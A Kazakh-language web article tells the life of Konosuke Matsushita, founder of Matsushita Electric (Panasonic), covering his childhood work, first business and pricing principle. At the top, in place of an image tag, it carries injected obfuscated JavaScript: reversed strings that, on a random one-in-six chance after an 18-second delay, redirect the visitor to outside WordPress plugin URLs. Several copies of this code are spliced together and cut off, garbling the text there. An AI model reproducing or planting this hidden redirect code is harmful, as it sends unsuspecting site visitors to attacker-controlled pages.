Коносуке Мацусита: Аңыз адам

Konosuke-Matsushita$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tories/Konosuke-Matsushita.jpg» height=»172″ width=»145″ />Консуке Мацусита (Konosuke Matshushita), жапондық Panasonic, National және Technics, сияқты әлемдік брендтерге айналған өнімдер шығатын Мацусита Электрик фирмасының аңызға айналған  негізін салушы. Ол жаңашыл және үздік бизнес-лидер ғана емес, өзгелерге жарқын үлгібола алатындай кәсіпкер.
Инноватор мұндай жетістіктерге  бастауыш сыныпты бітірмей-ақ жетті! Консуке Мацусита 9 жасқа келгенде мектепті тастап, жұмыс істеуге мәжбүр болды. 6 жыл бойы велосипед шеберханасында шебердің көмекшісі болып істеген ол 15 жасында Osaka Electric Light Company-ға жұмысқа тұрды. Коносуке Мацусита барлық уақытта компанияның ақаулы өнімдерін тауып, жөндеуге тырысатын. 22 жасында жаңа конструкцияның штепсельді вилкасын ойлап тапты. Бірақ басшылық оның рационализаторлық ұсынысын кезекті рет қабылдамай тастады. Осыдан кейін Коносуке Мацусита компаниядан кетіп өзінің жеке ісін бастады, инновациялық электропатрондар шығаратын өндірісті жолға қойды. Алғаш бизнесін дамыту үшін онда бар болғаны 100 йенге тең болатын капиталы бар еді. Аңызға бергісіз тарихы бар Мацусита Электрик компаниясының тарихы 1917 жылы осылай басталған еді. Кейінірек Коносуке Мацусита сегіз зауыттың иесіне айналды, өнімдер құлаққа жағымды естілетін Panasonic маркасымен тарала бастады.


Бәрін нольден, жоқжерден бастаған оның байлығы өмірінің соңында 3 миллиард долларды құраған еді, ал, ол негізін салған Matsushita Electric Industrial Ltd компаниясының капиталы 42 миллиард долларға жетті. 80 жасында пенсияға шыққанда Коносуке Мацусита тек қана ең бай жапондық бизнесмен ғана болып қойған жоқ, ең бастысы әлемді тамсандырған компанияны құрған  ең құрметті бизнес-лидер, аңыз-адам болды. Коносуке Мацусита ұлы инноватор және басқарушы ғана емес, бизнес-гуру болды. Ол менеджмент искусствосы жайлы кітап жазды, курстар өткізді, көптеген мақалалар жазды. Ол милиордер бола тұра тұрмыста тым қарапайым болатын, дүние-байлық жинау үшін ақшасын жаратқан емес. Жинақталған капиталына қорлар мен бизнес-мектептер ашты. Сондай-ақ Жапониядағы  саяси жүйені жақсартуға ұмтылды, ондаған әлеуметтік жобалармен жұмыс істеді.

        БИЗНЕСТІҢ ҚИЫН КЕЗЕҢДЕРІ

Бизнесін жасау үшін болар болмас капиталы бар Консуке Мацусита өзіндей ойлайтын аз ғана топқа арқа сүйеді, олар жаңа фирмаға сеніп, атсалысқан әйелі және үш туысы мен таныстары болатын. Бұл бесеудің ешқайсысының да тым болмағанда орта білімі де болған жоқ.
Соған қарамастан бұл командада кейін жапондық экономикалық ғажайыптың символына айналған болашақ екі бірдей бизнесмен бар еді.  Муцуситаның туысы  Тошио Иуэ әлемге әйгілі SANYO компаниясының президенті ретінде танылды.

                     Мацуситаның бизнестегі жетістігінің алғашқы формуласы

1918 –ші жылдың өзінде –ақ Мацусита  өзінің бизнес әлеміндегі ең танымал алғашқы бизнес –ұстанымын қалыптастырған болатын:  қалыптасып қалған нарыққа ену үшін  бәрін бәрінен 30 пайыз жақсы істеу керек және 30 пайыз арзан болу керек. Маtsusita Electric компаниясы ешуақытта түбірінен жаңа өнім шығарған емес. Ол тауарды жетілдіре түсуді, басқадан сапалылығына қарамастан арзан өнім ұсынуға ұмтылды, және бұл ұмтылысы ақталды нарықта бұл өнімдер үлкен сұранысқа ие болды.  Оның стратегиясы  тұтынушы  талабын мұқият зерттеп есепке алуға негізделді және тауарды өткізудің  жаңа технологиясын табу үшін үнемі ізденісте болды. Осы формула бойынша жұмыс істеген олар компания құрылған соң небәрі  санаулы ғана жылдардың ішінде  әр ай сайын  жаңа бұйым шығаратын және олар  нарықта жақсы өтетін.{jcomments on}

Leave a Reply

Ваш адрес email не будет опубликован. Обязательные поля помечены *

Яндекс.Метрика